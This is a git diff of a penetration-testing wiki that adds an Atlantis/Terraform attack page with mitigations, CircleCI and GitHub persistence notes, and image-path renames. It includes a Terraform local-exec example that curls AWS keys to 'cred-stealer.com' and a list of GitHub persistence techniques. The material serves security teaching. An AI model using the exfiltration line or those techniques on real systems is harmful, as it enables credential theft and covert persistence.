Examples of (likely) CoinJoin transactions IDs on bitcoin's blockchain are `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
|
||||
|
||||
|
@ -278,4 +278,3 @@ Note that there isn't any field for the origin address, this is because this can
|
|||
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
|
||||
* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
|
||||
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
|
||||
|
2
blockchain/blockchain-and-crypto-currencies/page-1.md
Normal file
|
@ -0,0 +1,2 @@
|
|||
# Page 1
|
||||
|
228
cloud-security/atlantis.md
Normal file
|
@ -0,0 +1,228 @@
|
|||
# Atlantis
|
||||
|
||||
## Basic Information
|
||||
|
||||
Atlantis basically helps you to to run terraform from Pull Requests from your git server.
|
||||
|
||||
![](<../.gitbook/assets/image (307).png>)
|
||||
|
||||
## Atlantis Access
|
||||
|
||||
### Git Server Credentials
|
||||
|
||||
**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
|
||||
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
|
||||
[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
|
||||
|
||||
{% hint style="warning" %}
|
||||
In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
|
||||
{% endhint %}
|
||||
|
||||
### Webhooks
|
||||
|
||||
Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
|
||||
|
||||
One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
|
||||
|
||||
Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
|
||||
|
||||
{% hint style="warning" %}
|
||||
Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
|
||||
{% endhint %}
|
||||
|
||||
### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
|
||||
|
||||
Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
|
||||
|
||||
It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
|
||||
|
||||
* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
|
||||
* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
|
||||
* [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
|
||||
* [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider\_reference)
|
||||
* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
|
||||
* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
|
||||
* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
|
||||
|
||||
{% hint style="warning" %}
|
||||
The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
|
||||
{% endhint %}
|
||||
|
||||
## Server Configuration
|
||||
|
||||
Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
|
||||
|
||||
* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
|
||||
* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)****
|
||||
|
||||
Values are **chosen in this order**:
|
||||
|
||||
1. Flags
|
||||
2. Environment Variables
|
||||
3. Config File
|
||||
|
||||
{% hint style="warning" %}
|
||||
Note that in the configuration you might find interesting values such as **tokens and passwords**.
|
||||
{% endhint %}
|
||||
|
||||
### Repos Configuration
|
||||
|
||||
Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
|
||||
|
||||
1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
|
||||
1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
|
||||
2. ****[**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
|
||||
3. **Default** values
|
||||
|
||||
#### PR Protections
|
||||
|
||||
Atlantis allows to indicate if you want the **PR** to be **approved** by somebody else (even if that isn't set in the branch protection) and/or be **mergeable** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
|
||||
|
||||
In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
|
||||
|
||||
#### Scripts
|
||||
|
||||
The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) **** (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) **** (_post workflow hooks_) a **workflow is executed.**
|
||||
|
||||
There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml` ** file.
|
||||
|
||||
#### Workflow
|
||||
|
||||
In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
|
||||
****Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
|
||||
|
||||
{% hint style="danger" %}
|
||||
If the flag **** `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
|
||||
This will basically give **RCE in the Atlantis server to any user that can access that repo**.
|
||||
|
||||
```yaml
|
||||
# atlantis.yaml
|
||||
version: 3
|
||||
projects:
|
||||
- dir: .
|
||||
workflow: custom1
|
||||
workflows:
|
||||
custom1:
|
||||
plan:
|
||||
steps:
|
||||
- init
|
||||
- run: my custom plan command
|
||||
apply:
|
||||
steps:
|
||||
- run: my custom apply command
|
||||
```
|
||||
{% endhint %}
|
||||
|
||||
#### Conftest Policy Checking
|
||||
|
||||
Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev) **policies** against the plan output. Common usecases for using this step include:
|
||||
|
||||
* Denying usage of a list of modules
|
||||
* Asserting attributes of a resource at creation time
|
||||
* Catching unintentional resource deletions
|
||||
* Preventing security risks (ie. exposing secure ports to the public)
|
||||
|
||||
You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
|
||||
|
||||
## Atlantis Commands
|
||||
|
||||
****[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
|
||||
|
||||
```bash
|
||||
# Get help
|
||||
atlantis help
|
||||
|
||||
# Run terraform plan
|
||||
atlantis plan [options] -- [terraform plan flags]
|
||||
##Options:
|
||||
## -d directory
|
||||
## -p project
|
||||
## --verbose
|
||||
## You can also add extra terraform options
|
||||
|
||||
# Run terraform apply
|
||||
atlantis apply [options] -- [terraform apply flags]
|
||||
##Options:
|
||||
## -d directory
|
||||
## -p project
|
||||
## -w workspace
|
||||
## --auto-merge-disabled
|
||||
## --verbose
|
||||
## You can also add extra terraform options
|
||||
```
|
||||
|
||||
## Attacks
|
||||
|
||||
Atlantis could be exploited by
|
||||
|
||||
* An attacker submitting a **pull request** that contains a **malicious Terraform file** that uses a **malicious provider or an** [**`external` data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) that **Atlantis** then **runs `terraform plan`** on (which it does automatically unless you've turned off automatic plans).
|
||||
* Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)****
|
||||
|
||||
```
|
||||
resource "null_resource" "null" {
|
||||
provisioner "local-exec" {
|
||||
command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
|
||||
}
|
||||
}
|
||||
```
|
||||
* Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** `master`.
|
||||
* Someone adding **`atlantis plan/apply` comments on your valid pull requests** causing terraform to run when you don't want it to.
|
||||
* **Bitbucket**: Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
|
||||
* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
|
||||
* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
|
||||
* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
|
||||
|
||||
## Mitigations
|
||||
|
||||
### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
|
||||
|
||||
Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
|
||||
|
||||
### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
|
||||
|
||||
If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
|
||||
|
||||
### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
|
||||
|
||||
Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
|
||||
|
||||
* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
|
||||
* Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
|
||||
* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
|
||||
* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
|
||||
|
||||
This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
|
||||
|
||||
### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
|
||||
|
||||
If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
|
||||
|
||||
To prevent this, you could:
|
||||
|
||||
1. Bake providers into the Atlantis image or host and deny egress in production.
|
||||
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
|
||||
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
|
||||
|
||||
### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
|
||||
|
||||
Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
|
||||
|
||||
If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
|
||||
|
||||
#### [#](https://www.runatlantis.io/docs/security.html#azure-devops-basic-authentication)Azure DevOps Basic Authentication <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
|
||||
|
||||
Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
|
||||
|
||||
### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
|
||||
|
||||
If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
|
||||
|
||||
### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
|
||||
|
||||
It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
|
||||
|
||||
You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
|
||||
|
||||
## References
|
||||
|
||||
* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)****
|
|
@ -17,7 +17,7 @@ According to [**the docs**](https://circleci.com/docs/2.0/env-vars/#) there are
|
|||
|
||||
### Built-in env variables
|
||||
|
||||
Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
|
||||
Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
|
||||
|
||||
### Clear text
|
||||
|
||||
|
@ -255,4 +255,5 @@ jobs:
|
|||
* _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
|
||||
* It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
|
||||
* Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
|
||||
* It you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
|
||||
* If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
|
||||
* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
## Architecture
|
||||
|
||||
![](<../../.gitbook/assets/image (651) (1).png>)
|
||||
![](<../../.gitbook/assets/image (307) (3).png>)
|
||||
|
||||
### ATC: web UI & build scheduler
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@ Note that other cloud resources could be searched for and that some times these
|
|||
|
||||
As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...).
|
||||
|
||||
![](<../../.gitbook/assets/image (628) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (618).png>)
|
||||
|
||||
The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names:
|
||||
|
||||
|
|
|
@ -44,7 +44,7 @@ Tools (each tool contains its list of regexes):
|
|||
* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks)
|
||||
* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
|
||||
|
||||
## Internal Recon
|
||||
## Internal Recon & Attacks
|
||||
|
||||
For this scenario we are going to suppose that you have obtained some access to a github account.
|
||||
|
||||
|
@ -248,7 +248,7 @@ jobs:
|
|||
* **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections.
|
||||
* **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.
|
||||
* **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
|
||||
* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
|
||||
* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
|
||||
* If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
|
||||
|
||||
### Bypass Environments Protections
|
||||
|
@ -266,3 +266,15 @@ Note, that you might find the edge case where **all the branches are protected**
|
|||
```
|
||||
|
||||
Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
|
||||
|
||||
## Persistence
|
||||
|
||||
* Generate **user token**
|
||||
* Steal **github tokens** from **secrets**
|
||||
* **Deletion** of workflow **results** and **branches** 
|
||||
* Give **more permissions to all the org**
|
||||
* Create **webhooks** to exfiltrate information
|
||||
* Invite **outside collaborators**
|
||||
* **Remove** **webhooks** used by the **SIEM**
|
||||
* Create/modify **Github Action** with a **backdoor**
|
||||
* Find v**ulnerable Github Action to command injection** via **secret** value modification 
|
||||
|
|
|
@ -8,7 +8,7 @@ This machine was categorised as easy and it was pretty easy.
|
|||
|
||||
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
|
||||
|
||||
![](<../../.gitbook/assets/image (79) (2).png>)
|
||||
![](<../../.gitbook/assets/image (79) (1).png>)
|
||||
|
||||
In as you can see 2 ports are open: 80 (**HTTP**) and 22 (**SSH**)
|
||||
|
||||
|
|
|
@ -387,7 +387,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
|
|||
|
||||
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
|
||||
|
||||
![](<../../.gitbook/assets/image (620).png>)
|
||||
![](<../../.gitbook/assets/image (621) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
|
||||
|
||||
|
@ -456,7 +456,7 @@ For example, in the following situation there is a **local variable in the stack
|
|||
|
||||
So, flag is in **0xffffcf4c**
|
||||
|
||||
![](<../../.gitbook/assets/image (618) (2).png>)
|
||||
![](<../../.gitbook/assets/image (622).png>)
|
||||
|
||||
And from the leak you can see the **pointer to the flag** is in the **8th** parameter:
|
||||
|
||||
|
|
|
@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
|
|||
|
||||
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
|
||||
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (2) (1) (1) (1) (2).png>)
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2).png>)
|
||||
|
||||
An then use the following code
|
||||
|
||||
|
|
|
@ -134,7 +134,7 @@ Some interesting attributes:
|
|||
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (among others):
|
||||
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
|
||||
|
||||
![](<../../../.gitbook/assets/image (507) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (507) (1).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (509).png>)
|
||||
|
||||
|
|
|
@ -60,7 +60,7 @@ This tool is also useful to get **other information analysed** from the packets
|
|||
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
|
||||
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
|
||||
|
||||
![](<../../../.gitbook/assets/image (567) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (567) (1) (1).png>)
|
||||
|
||||
### [BruteShark](https://github.com/odedshimon/BruteShark)
|
||||
|
||||
|
|
|
@ -83,7 +83,7 @@ You can add a column that show the Host HTTP header:
|
|||
|
||||
And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):
|
||||
|
||||
![](<../../../.gitbook/assets/image (408).png>)
|
||||
![](<../../../.gitbook/assets/image (408) (1).png>)
|
||||
|
||||
## Identifying local hostnames
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
|
|||
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (495) (1) (1).png>)
|
||||
|
||||
### Volume Shadow Copies
|
||||
|
||||
|
@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
|||
|
||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1).png>)
|
||||
|
||||
### USB Detective
|
||||
|
||||
|
|
|
@ -133,7 +133,7 @@ Within this registry it's possible to find:
|
|||
|
||||
![](<../../../.gitbook/assets/image (477).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (479) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (479) (1) (1).png>)
|
||||
|
||||
Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and comparing the values of the sub-keys it's possible to find the VID value
|
||||
|
||||
|
@ -153,7 +153,7 @@ Having the **{GUID}** of the device it's now possible to **check all the NTUDER.
|
|||
|
||||
Checking the registry `System\MoutedDevices` it's possible to find out **which device was the last one mounted**. In the following image check how the last device mounted in `E:` is the Thoshiba one (using the tool Registry Explorer).
|
||||
|
||||
![](<../../../.gitbook/assets/image (483) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (483) (1).png>)
|
||||
|
||||
### Volume Serial Number
|
||||
|
||||
|
|
|
@ -937,7 +937,7 @@ int main(int argc, char * argv[]) {
|
|||
I exploit needs to find a pointer to something mounted on the host. The original exploit used the file `/.dockerinit` and this modified version uses `/etc/hostname`. **If the exploit isn't working** maybe you need to set a different file. To find a file that is mounted in the host just execute `mount` command:
|
||||
{% endhint %}
|
||||
|
||||
![](<../../.gitbook/assets/image (407) (1).png>)
|
||||
![](<../../.gitbook/assets/image (407) (2).png>)
|
||||
|
||||
**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
|
||||
|
||||
|
|
|
@ -193,7 +193,7 @@ The offsets of any constructors are held in the **\_\_mod\_init\_func** section
|
|||
|
||||
The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type.
|
||||
|
||||
![](<../../.gitbook/assets/image (507) (3).png>)
|
||||
![](<../../.gitbook/assets/image (555).png>)
|
||||
|
||||
#### Get the info
|
||||
|
||||
|
|
|
@ -108,7 +108,7 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi
|
|||
2. The JSON payload is encrypted using Absinthe (**`NACSign`**)
|
||||
3. All requests over HTTPs, built-in root certificates are used
|
||||
|
||||
![](<../../../.gitbook/assets/image (566).png>)
|
||||
![](<../../../.gitbook/assets/image (566) (1).png>)
|
||||
|
||||
The response is a JSON dictionary with some important data like:
|
||||
|
||||
|
@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
|
|||
* Signed using the **device identity certificate (from APNS)**
|
||||
* **Certificate chain** includes expired **Apple iPhone Device CA**
|
||||
|
||||
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>)
|
||||
|
||||
### Step 6: Profile Installation
|
||||
|
||||
|
|
|
@ -223,7 +223,7 @@ In this case you could try to abuse the functionality creating a web with the fo
|
|||
|
||||
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
|
||||
|
||||
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (436) (1) (1).png>)
|
||||
|
||||
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s
|
|||
|
||||
**Only for Windows.**
|
||||
|
||||
![](<../../.gitbook/assets/image (207) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (207) (1).png>)
|
||||
|
||||
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
|
||||
|
||||
|
|
|
@ -210,7 +210,7 @@ However there are **a lot of different command line useful options** that you ca
|
|||
|
||||
First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
|
||||
|
||||
![](<../../.gitbook/assets/image (367).png>)
|
||||
![](<../../.gitbook/assets/image (367) (1).png>)
|
||||
|
||||
**Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\
|
||||
For example you can run it like:
|
||||
|
|
|
@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
|
|||
|
||||
You should also check the **ContentProvider code** to search for queries:
|
||||
|
||||
![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (121) (1) (1).png>)
|
||||
|
||||
Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
|
||||
|
||||
|
@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
|
|||
|
||||
![](<../../../.gitbook/assets/image (187).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
Because you will be able to call them
|
||||
|
||||
|
|
|
@ -25,7 +25,7 @@ Several **counter-measures** could be in place to avoid this vulnerability.
|
|||
|
||||
### CSRF map
|
||||
|
||||
![](<../.gitbook/assets/image (112).png>)
|
||||
![](<../.gitbook/assets/image (307) (1).png>)
|
||||
|
||||
## Defences Bypass
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ The following properties or combination of properties apply to ViewState informa
|
|||
|
||||
## **Test Cases**
|
||||
|
||||
![](<../../.gitbook/assets/image (309) (1).png>)
|
||||
![](<../../.gitbook/assets/image (309).png>)
|
||||
|
||||
### Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false
|
||||
|
||||
|
|
|
@ -149,7 +149,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro
|
|||
|
||||
Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) with Java classes for being tested.
|
||||
|
||||
![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
|
||||
![](<../../.gitbook/assets/intruder4 (1) (1).gif>)
|
||||
|
||||
### More Information
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example:
|
||||
|
||||
![](<../../../.gitbook/assets/image (389) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (356).png>)
|
||||
|
||||
In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties.
|
||||
|
||||
|
|
|
@ -41,7 +41,7 @@ The good news is that **this payload is executed automatically when the file is
|
|||
|
||||
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
|
||||
|
||||
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1).png>)
|
||||
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>)
|
||||
|
||||
### More
|
||||
|
||||
|
|
|
@ -500,7 +500,7 @@ def handleResponse(req, interesting):
|
|||
|
||||
## More info
|
||||
|
||||
![](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg)
|
||||
![](../../.gitbook/assets/eki5edauuaaipik.jpg)
|
||||
|
||||
[Image from here.](https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104)
|
||||
|
||||
|
|
|
@ -52,7 +52,7 @@ Note that if you put just the new line characters sending a header without conte
|
|||
|
||||
In this case the injection was performed inside the request line:
|
||||
|
||||
![](<../../.gitbook/assets/image (640) (1).png>)
|
||||
![](<../../.gitbook/assets/image (645) (1) (1).png>)
|
||||
|
||||
### URL Prefix Injection
|
||||
|
||||
|
|
|
@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **
|
|||
|
||||
This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**
|
